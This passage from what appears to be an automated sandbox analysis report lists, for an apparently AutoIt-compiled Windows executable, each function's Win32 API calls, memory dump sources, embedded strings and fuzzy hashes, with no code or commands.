                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A15A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00A12DC2
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A12DE1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: 3c90fc37c82013648a78ba0ef1b41207026d385957de9f0db1bd3ca2606d397a
                        • Instruction ID: c13b1d909920790b2cbcd601b869dd1a24d5e9881a98fe073374aa5ab57bd9a3
                        • Opcode Fuzzy Hash: 3c90fc37c82013648a78ba0ef1b41207026d385957de9f0db1bd3ca2606d397a
                        • Instruction Fuzzy Hash: 67319C72241214BFEB118F50DC8AFEB3BADEF09761F048055FE089A291C6759C51CBA4
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: 3f284848acd6d5310b5028091f6152bc7c540afa2377b4f94ff81c8adade535c
                        • Instruction ID: 443cfc3f9a228f10715c89f2c0e7f6e4beac2da3e456829d1ea05426c51d95e2
                        • Opcode Fuzzy Hash: 3f284848acd6d5310b5028091f6152bc7c540afa2377b4f94ff81c8adade535c
                        • Instruction Fuzzy Hash: 5A21EE71744A89BFDA169A228E92FFB335CBF6178CF450430FD049A581FB65ED1081E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: NULL Pointer assignment$Not an Object type
                        • API String ID: 0-572801152
                        • Opcode ID: 77fcacb557caa95ae716b367ae9b7e48d755cdda2583cd1c717fb7b8b3ff1ff8
                        • Instruction ID: be24ef59bff360109649013a919add53f0d3f86af88ded3927f814239ae59bc9
                        • Opcode Fuzzy Hash: 77fcacb557caa95ae716b367ae9b7e48d755cdda2583cd1c717fb7b8b3ff1ff8
                        • Instruction Fuzzy Hash: 46D1BE75E0060AAFDF10DFA8E891BAEB7B5BF48304F148569E915AB281E370DD41CF90
                        APIs
                        • GetCPInfo.KERNEL32(?,?), ref: 009C15CE
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 009C1651
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009C16E4
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 009C16FB
                          • Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009C1777
                        • __freea.LIBCMT ref: 009C17A2
                        • __freea.LIBCMT ref: 009C17AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                        • String ID:
                        • API String ID: 2829977744-0
                        • Opcode ID: e98fcc8face0766bfa6c1ef069963981935a1ff8e3eef3a3461fd3be8a7a743e
                        • Instruction ID: 6be01a621404a29ad7cdcfc66cf35f5105a4e938ecb14abd9d55cf7a2e069f7d
                        • Opcode Fuzzy Hash: e98fcc8face0766bfa6c1ef069963981935a1ff8e3eef3a3461fd3be8a7a743e
                        • Instruction Fuzzy Hash: DE91B371E002569ADF208EA4C951FEEBBB99F8A310F18465DF805E7182D735CD40CBAA
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearInit
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 2610073882-625585964
                        • Opcode ID: 5d8c9189974e493e7888d1008e76f1f1c22be58f43024fb676e4af130b416329
                        • Instruction ID: 39cdb9ec387d6128aeddd0dc0b598add0e2ff702cde51aaa0a8ea4fa2fcfdfce
                        • Opcode Fuzzy Hash: 5d8c9189974e493e7888d1008e76f1f1c22be58f43024fb676e4af130b416329
                        • Instruction Fuzzy Hash: 959173B1A00219AFDF20CFA5D844FAEB7B8FF89714F108559F615AB281D7709941CFA0
                        APIs
                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 009F125C
                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 009F1284
                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009F12A8
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F12D8
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F135F
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F13C4
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F1430
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                        • String ID:
                        • API String ID: 2550207440-0
                        • Opcode ID: 624ee61c51f64d08b3aec5b56183f68b71da22c1492e1089d27557822fbe0a8f
                        • Instruction ID: f44e138efc3c78415b85b8bb2fcc3e7f344f2f43351e783fa1faf7b871809fe5
                        • Opcode Fuzzy Hash: 624ee61c51f64d08b3aec5b56183f68b71da22c1492e1089d27557822fbe0a8f
                        • Instruction Fuzzy Hash: 2F919D71A00219DFDB00DF98C885BBEB7B9FF85325F104429EA50EB2A1D774A941CB90
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: e74ba7c39bb192cd442d53091a09f195faeb01668c5a206daaf65281230b5923
                        • Instruction ID: ce72e9b4724386fe3999830c1fcbd0025bb4555aa7037845cb05c13667bfbb16
                        • Opcode Fuzzy Hash: e74ba7c39bb192cd442d53091a09f195faeb01668c5a206daaf65281230b5923
                        • Instruction Fuzzy Hash: 34913671D44219EFCF10CFA9C884AEEBBB8FF49320F148459E915B7251D378A942CB60
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00A0396B
                        • CharUpperBuffW.USER32(?,?), ref: 00A03A7A
                        • _wcslen.LIBCMT ref: 00A03A8A
                        • VariantClear.OLEAUT32(?), ref: 00A03C1F
                          • Part of subcall function 009F0CDF: VariantInit.OLEAUT32(00000000), ref: 009F0D1F
                          • Part of subcall function 009F0CDF: VariantCopy.OLEAUT32(?,?), ref: 009F0D28
                          • Part of subcall function 009F0CDF: VariantClear.OLEAUT32(?), ref: 009F0D34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4137639002-1221869570
                        • Opcode ID: 5863b099b8cc54479f35f93127cd6352caecc83f7282e36f70901b073c151938
                        • Instruction ID: 3a68f034b8f20c0d9b0d6eeaea5058c576ffe21a986eafd99b6a69d627cc92d4
                        • Opcode Fuzzy Hash: 5863b099b8cc54479f35f93127cd6352caecc83f7282e36f70901b073c151938
                        • Instruction Fuzzy Hash: 569148756083459FCB04EF64D48096AB7E8BFC9354F14882DF8999B391DB31EE05CB92
                        APIs
                          • Part of subcall function 009E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?,?,009E035E), ref: 009E002B
                          • Part of subcall function 009E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0046
                          • Part of subcall function 009E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0054
                          • Part of subcall function 009E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?), ref: 009E0064
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A04C51
                        • _wcslen.LIBCMT ref: 00A04D59
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A04DCF
                        • CoTaskMemFree.OLE32(?), ref: 00A04DDA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 614568839-2785691316
                        • Opcode ID: 2e6911e63a533eecb323922d105ed37442838371529a02afdbb66ad681581a20
                        • Instruction ID: 1ff9a9dd21b1fa7b6f18f9857accd8fb29d7c1ec86478c94dd9a1af2b618be07
                        • Opcode Fuzzy Hash: 2e6911e63a533eecb323922d105ed37442838371529a02afdbb66ad681581a20
                        • Instruction Fuzzy Hash: 829129B1D0021DAFDF14EFA4D891AEEB7B8BF48310F10816AE515A7291EB309E45CF60
                        APIs
                        • GetMenu.USER32(?), ref: 00A12183
                        • GetMenuItemCount.USER32(00000000), ref: 00A121B5
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A121DD
                        • _wcslen.LIBCMT ref: 00A12213
                        • GetMenuItemID.USER32(?,?), ref: 00A1224D
                        • GetSubMenu.USER32(?,?), ref: 00A1225B
                          • Part of subcall function 009E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E3A57
                          • Part of subcall function 009E3A3D: GetCurrentThreadId.KERNEL32 ref: 009E3A5E
                          • Part of subcall function 009E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009E25B3), ref: 009E3A65
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A122E3
                          • Part of subcall function 009EE97B: Sleep.KERNEL32 ref: 009EE9F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                        • String ID:
                        • API String ID: 4196846111-0
                        • Opcode ID: 67823781cdaf41d8cfd8d4f20bdc5403cf391d63cbd4e00dfe5c73e3717467e0
                        • Instruction ID: 7d2f861b42ef2ad41352ad510eda4664eab65f82f062881e13534e399f2fc032
                        • Opcode Fuzzy Hash: 67823781cdaf41d8cfd8d4f20bdc5403cf391d63cbd4e00dfe5c73e3717467e0
                        • Instruction Fuzzy Hash: 5B716F75A00205AFCB14EFA8C845BEEB7F5EF88320F148459E956EB351D734ED918B90
                        APIs
                        • GetParent.USER32(?), ref: 009EAEF9
                        • GetKeyboardState.USER32(?), ref: 009EAF0E
                        • SetKeyboardState.USER32(?), ref: 009EAF6F
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 009EAF9D
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 009EAFBC
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 009EAFFD
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009EB020
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: ac0457b4d7592f7ad098dece27aae32ab2aca81a050481c6b6ce7261c666b690
                        • Instruction ID: d409124d82289796c2be315928a796bee86c09606663acd538a80c5b2157558c
                        • Opcode Fuzzy Hash: ac0457b4d7592f7ad098dece27aae32ab2aca81a050481c6b6ce7261c666b690
                        • Instruction Fuzzy Hash: 6751AFA06047D53DFB3783368C45BBBBEA95B46304F088989E1E9558E2C398FC88D751
                        APIs
                        • GetParent.USER32(00000000), ref: 009EAD19
                        • GetKeyboardState.USER32(?), ref: 009EAD2E
                        • SetKeyboardState.USER32(?), ref: 009EAD8F
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009EADBB
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009EADD8
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009EAE17
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009EAE38
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: a183f1c04071ec4f96e969b352201de918625c829d5cf4754af77086ddb4f43c
                        • Instruction ID: 0630ed468f727cea1795a14a3476f2e4ed041d7100d607671e60297da19181f5
                        • Opcode Fuzzy Hash: a183f1c04071ec4f96e969b352201de918625c829d5cf4754af77086ddb4f43c
                        • Instruction Fuzzy Hash: A851D1A15047D53DFB3382668C95BBABEAD6F46300F08848CE1D9468E2C294FC88D762
                        APIs
                        • GetConsoleCP.KERNEL32(009C3CD6,?,?,?,?,?,?,?,?,009B5BA3,?,?,009C3CD6,?,?), ref: 009B5470
                        • __fassign.LIBCMT ref: 009B54EB
                        • __fassign.LIBCMT ref: 009B5506
                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,009C3CD6,00000005,00000000,00000000), ref: 009B552C
                        • WriteFile.KERNEL32(?,009C3CD6,00000000,009B5BA3,00000000,?,?,?,?,?,?,?,?,?,009B5BA3,?), ref: 009B554B
                        • WriteFile.KERNEL32(?,?,00000001,009B5BA3,00000000,?,?,?,?,?,?,?,?,?,009B5BA3,?), ref: 009B5584
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: e5e7ec65b03eb2cfc861b9875dabd16ac5694199e27284094e7e512ba9a1cc47
                        • Instruction ID: 9695fc074a3d171c90828254aebfa5a3669aeeca4e8f83c522114b80cb721805
                        • Opcode Fuzzy Hash: e5e7ec65b03eb2cfc861b9875dabd16ac5694199e27284094e7e512ba9a1cc47
                        • Instruction Fuzzy Hash: 9F510270A00609AFDB20CFA8D985BEEBBF9EF09321F15411AF955E7291D770DA41CB60
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 009A2D4B
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 009A2D53
                        • _ValidateLocalCookies.LIBCMT ref: 009A2DE1
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 009A2E0C
                        • _ValidateLocalCookies.LIBCMT ref: 009A2E61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: 4593c94286b64bc6f2f3dd6df2839ca3863cd0cde693d5cba0f1514e49878de3
                        • Instruction ID: d93300ed88ee8a44dbd577cdf58f311f6037401ea7c2c8d7ae687bb775c6328b
                        • Opcode Fuzzy Hash: 4593c94286b64bc6f2f3dd6df2839ca3863cd0cde693d5cba0f1514e49878de3
                        • Instruction Fuzzy Hash: EF417134A01209ABCF10DF6CC845A9EBBB9BF86328F148155E8146B392D735EA55CBD0
                        APIs
                          • Part of subcall function 00A0304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A0307A
                          • Part of subcall function 00A0304E: _wcslen.LIBCMT ref: 00A0309B
                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A01112
                        • WSAGetLastError.WSOCK32 ref: 00A01121
                        • WSAGetLastError.WSOCK32 ref: 00A011C9
                        • closesocket.WSOCK32(00000000), ref: 00A011F9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 2675159561-0
                        • Opcode ID: fe07f190adc204147e978c6c4811091507c2547f66ca15d3940f341b0aeadbbb
                        • Instruction ID: 02af2845d97112b9c598529fd7012f923348100e0760a59ee61d7990c897b8ca
                        • Opcode Fuzzy Hash: fe07f190adc204147e978c6c4811091507c2547f66ca15d3940f341b0aeadbbb
                        • Instruction Fuzzy Hash: 7141C371600208AFDB14DF54D884BEABBE9EF85324F148159F9159B2D1D770ED42CBE1
                        APIs
                          • Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ECF22,?), ref: 009EDDFD
                          • Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ECF22,?), ref: 009EDE16
                        • lstrcmpiW.KERNEL32(?,?), ref: 009ECF45
                        • MoveFileW.KERNEL32(?,?), ref: 009ECF7F
                        • _wcslen.LIBCMT ref: 009ED005
                        • _wcslen.LIBCMT ref: 009ED01B
                        • SHFileOperationW.SHELL32(?), ref: 009ED061
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                        • String ID: \*.*
                        • API String ID: 3164238972-1173974218
                        • Opcode ID: 1f27cde6e76b02666da86a3b2bd5a1220e3f346abd87c49d79b6edb1eede1acb
                        • Instruction ID: 07204f6299b5ebdf215ab42f33085a38c4d2f4fafbcda1369896342028cc089f
                        • Opcode Fuzzy Hash: 1f27cde6e76b02666da86a3b2bd5a1220e3f346abd87c49d79b6edb1eede1acb
                        • Instruction Fuzzy Hash: EB4166B19452585FDF13EFA5C981BDEB7BDAF48380F0004E6E545EB141EB34AA85CB50
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A12E1C
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A12E4F
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A12E84
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A12EB6
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A12EE0
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A12EF1
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A12F0B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
